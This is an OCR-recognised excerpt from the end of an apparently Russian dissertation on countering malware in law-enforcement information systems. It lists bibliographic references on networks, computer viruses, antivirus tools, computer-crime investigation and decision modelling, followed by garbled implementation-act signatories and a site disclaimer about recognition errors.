13. Computer networks. Principles, technologies, protocols: Textbook for universities. / V.G. Olifer, N.A. Olifer SPb.: Peter, 2003. - 864 p.

14. Syrkov B.Yu. Computer system through the eyes of a hacker // Technologies and communications. -1998. No. 6. P. 98-100

15. Bezrukov N.N. Introduction to computer virology. General principles of operation, classification and catalog of the most common viruses in MS-DOS. Kyiv, 1989. - 196 p.

16. Bezrukov N.N. Computer Virology: A Reference Guide. -Kiev, 1991.

17. Bezrukov N.N. Computer viruses. - M., 1991. - 132 p.

18. Kaspersky E.V. Computer viruses in MS-DOS. M.: Edel Publishing House, 1992. - 120 p.

19. Kaspersky E.V. Computer viruses, what they are and how to fight them. M.: "SK Press", 1998. - 288 p.

20. Fights F., Johnston P., Kratz M. Computer virus: problems and forecast. -M.: Mir, 1993. 175 p.

21. Guliev N.A. Computer viruses, a look from the inside. M.: DMK, 1998.-304 p.

22. Technologies for developing malware based on computer viruses // E.G. Gennadieva, K.A. Razinkin, Yu.M. Safonov, P.F. Sushkov, R.N. Tyunyakin // Information and security. Issue 1. - Voronezh: VSTU, 2002. - pp. 79-85.

23. Virological typing of malicious programs // JI.B. Chagina, K.S. Skryl, P.F. Sushkov // Science of production, 2005. - Issue 6. - pp. 12-17.

24. Minaev V.A., Skryl S.V. Computer viruses as systemic evil. // Security systems SB-2002: Materials of the XI scientific and technical conference of the International Forum of Informatization - M.: GPS Academy, 2002. - pp. 18-24.

25. Data transmission systems and networks: Textbook. / M.V. Garanin, V.I. Zhuravlev, S.V. Kunegin M.: Radio and communication, 2001. - 336 p.

26. Telecommunication systems and networks: Textbook In 3 volumes. Volume 1 Modern technologies / B.I. Kruk, V.N. Popantonopoulo, V.P. Shuvalov - M.: Hotline - Telecom, 2003. - 647 p.

27. Protection of information in computer systems and networks. / Romanets Yu.V., Timofeev P.A., Shangin V.F. M.: Radio and communication, 2001. - 376 p.

28. Organizational and legal aspects of restricting access to information in the activities of internal affairs bodies / Asyaev P.I., Pozhilykh V.A., Sushkov P.F., Belousova I.A., Potanina I.V., Razinkin K.A. . // Information and security. - Issue 1. Voronezh: VSTU, 2002. - P. 43-47.

29. Kaspersky K. Network attack techniques. Techniques of counteraction. M.: Solon-R, 2001.-397 p.

30. Serdyuk V.A. Promising technologies for detecting information attacks. // Security systems. 2002. - No. 5(47). - P. 96-97.

31. Programming information security algorithms: Textbook. / Domashev A.V. Gruntovich M.M., Popov V.O., Pravikov D.I., Prokofiev I.V., Shcherbakov A.Yu. M.: Knowledge, 2002. - 416 p.

32. Grusho A.A., Timonina E.E. Fundamentals of information security. M.: Yachtsman, 1996.-192 p.

33. Security of departmental information and telecommunication systems. / Getmantsev A.A., Lipatnikov V.A., Plotnikov A.M., Sapaev E.G. VAS, 1997. 200 p.

34. Skryl S.V. Modeling and optimization of the functioning of automated control systems of internal affairs bodies in the context of countering malware: Abstract of the dissertation of Dr. tech. Sciences M.: Academy of State Fire Service of the Ministry of Internal Affairs of Russia, 2000. - 48 p.

35. Joel T. Patz Antivirus programs / PC Magazine / Russian Edition, 1996, No. 3 (46), pp. 70-85

36. Intelligent technologies of Doctor Web antivirus. / JSC "Dialognauka". // Security systems. 2002. - No. 2(44). - pp. 84-85.

37. Antimonov S.G. Intellectual confrontations on the front line Virus-antivirus. // Information and security: Materials of interregional scientific and practical work. conf. Information and security. - Issue 2. - Voronezh: VSTU, 2002. - P. 39-46.

38. Vorobyov V.F., Gerasimenko V.G., Potanin V.E., Skryl S.V. Design of means for traceological identification of computer crimes. Voronezh: Voronezh Institute of the Ministry of Internal Affairs of Russia, 1999. - 136 p.

39. Traces of computer crimes / Voynalovich V.Yu., Zavgorod-niy M.G., Skryl S.V., Sumin V.I. // Abstracts of reports of the international conference “Informatization of Law Enforcement Systems”, Part 2. M.: Academy of Management of the Ministry of Internal Affairs of Russia, 1997. p. 53-55.

40. Methodology for conducting primary investigative actions when investigating crimes in the field of high technology. / Sushkov P.F., Kochedykov S.S., Kiselev V.V., Artemov A.A. Bulletin of VI Ministry of Internal Affairs of Russia 2(9)" 2001 - Voronezh: VI Ministry of Internal Affairs of Russia 2001. - P. 152-155.

41. Increasing the detection rate of computer crimes // Bogachev S.Yu., A.N. Obukhov, P.F. Sushkov // Information and security. Vol. 2. - Voronezh: VSTU, 2004. - P. 114 - 115.

42. Computer and technical examination of illegal actions. // Sushkov P.F. // Bulletin of the Voronezh Institute of the Ministry of Internal Affairs of Russia. T. 4(19). -2004.-№4(19) - P. 52-55.

43. Mamikonov A.G., Kulba V.V., Shchelkov A.B. Reliability, protection and backup of information in automated control systems. M.: Energoatomizdat, 1986. - 304 p.

44. Sokolov A.V., Shangin V.F. Information protection in distributed corporate systems. M.: DMK Press, 2002. - 656 p.

45. Khasin E.V. An integrated approach to monitoring information and computing systems. // Scientific session MEPhI 2002: Materials of the IX All-Russian scientific and practical conference. conf. - M.: MEPhI, 2002. - P. 110-111.

46. ​​Buslenko N.P. Modeling of complex systems / N.P. Buslenko. - M.: Nauka, 1978.-400 p.

47. Sovetov B.Ya. Modeling of systems: Textbook for universities on specialization. “Automated control systems” / B.Ya. Sovetov, S.A. Yakovlev. - M.: Higher School, 1985. - 271 p.

48. Iglehart D.L. Regenerative modeling of queuing networks: Per. from English / D.L. Iglehart, D.S. Shedler. M.: Radio and communication, 1984. - 136 p.

49. Buslenko V.N. Automation of simulation modeling of complex systems / V.N. Buslenko. - M.: Nauka, 1977. - 239 p.

50. Tarakanov K.V. Analytical methods for studying systems / K.V. Tarakanov, L.A. Ovcharov, A.N. Tyryshkin. - M.: Soviet radio, 1974. 240 p.

51. Vilkas E.J., Mayminas E.Z. Solutions: theory, information, modeling. M.: Radio and communication, 1981. - 328 p. pp. 91-96.

52. Principles of structured modeling of security processes for special-purpose information systems. / P.I. Asyaev, V.N. Aseev, A.R. Mozhaitov, V.B. Shcherbakov, P.F. Sushkov // Radio engineering (magazine within a magazine), 2002, No. 11.

53. Tatg U. Graph theory: Transl. from English M.: Mir, 1988. - 424 p.

54. Ventzel E.S. Probability theory. M.: Publishing house of physical and mathematical literature, 1958. - 464 p.

55. Collection of scientific programs in Fortran. Vol. 1. Statistics. New York, 1970. / Trans. from English M.: “Statistics”, 1974. - 316 p.

56. Zaryaev A.V. Training of information security specialists: management models: Monograph M.: “Radio and Communications”, 2003. - 210 p.

57. Kini P.JI., Raiffa X. Decision making under multiple criteria of preference and substitution. M.: Radio and communication, 1981. - 560 p.

58. Larichev O.I. The science and art of decision making. M.: Nauka, 1979.-200 p.

59. Yakovlev S.A. Problems of planning simulation experiments in the design of information systems. // Automated data processing and management systems. L.: 1986. - 254 p.

60. Intelligent technologies of Doctor Web antivirus. / JSC "Dia-lognauka". // Security systems. 2002. - No. 2(44). - pp. 84-85.

61. Encyclopedia of computer viruses. / YES. Kozlov, A.A. Parandovsky, A.K. Parandovsky M.: “Solon-R”, 2001. - 457 p.

62. Joel T. Patz Antivirus programs / PC Magazine / Russian Edition, 1996, No. 3 (46), pp. 70-85.

63. Certification system for information security tools according to information security requirements No. ROSS RU.OOI.OIBHOO. State register of certified information security tools. Official website of the State Technical Commission of Russia, 2004.

64. Skryl S.V. Modeling and optimization of the functioning of automated control systems of internal affairs bodies in the context of countering malware: Abstract of the dissertation of Dr. tech. Sciences M.: Academy of State Fire Service of the Ministry of Internal Affairs of Russia, 2000. - 48 p.

65. Assessment of information security in information and telecommunication systems. / Minaev V.A., Skryl S.V., Potanin V.E., Dmitriev Yu.V. // Economics and production. 2001. - No. 4. - pp. 27-29.

66. Ventzel E.S. Operations Research M.: Soviet Radio, 1972 - 552 p.

67. Zadeh J1.A. The concept of a linguistic variable and its application to approximate decision making. M.: Mir, 1976. - 168 p.

68. Pospelov D.A. Logical-linguistic models in control systems. M.: Energy, 1981.-231 p.

69. Pospelov D.A. Situational management: theory and practice. -M.: Nauka, 1986.-284 p.

70. Raifa G. Decision analysis (introduction to the problem of choice under conditions of uncertainty). M.: Nauka, 1977. - 408 p.

71. Decision-making models based on linguistic variables / A.N. Borisov, A.V. Aleksev, O.A. Krumberg et al. Riga: Zinatne, 1982. - 256 p.

72. Kofman A. Introduction to the theory of fuzzy sets. M.: Radio and communication, 1982. - 432 p.

73. Fuzzy sets in control and artificial intelligence models. / Ed. YES. Pospelov. M.: Nauka, 1986. - 312 p.

74. Acts of implementation of research results

75. Deputy head of department “K” of the Central Internal Affairs Directorate, police lieutenant colonel1. Members of the commission: Art. detective of department “K” of the Central Internal Affairs Directorate, police captain, detective of department “K” of the Central Internal Affairs Directorate, police lieutenant1. Sokolovsky I.V.1. Povalukhin A. A.1. Razdymalin R.S.41. I APPROVED

76. Deputy Head of the Department of Internal Affairs of the Tambov Region, Police Lieutenant Colonel1. Members of the commission:1. B.J.I. Vorotnikov

77. Head of Department “K” of the USTM Department of Internal Affairs of the Tambov Region, police major

78. Senior detective officer for the Department of Internal Affairs of the USTM Department of Internal Affairs of the Tambov Region, police major1. R.V. Belevitin1. A.V. Bogdanov

Please note that the scientific texts presented above are posted for informational purposes only and were obtained through original dissertation text recognition (OCR). Therefore, they may contain errors associated with imperfect recognition algorithms. There are no such errors in the PDF files of dissertations and abstracts that we deliver.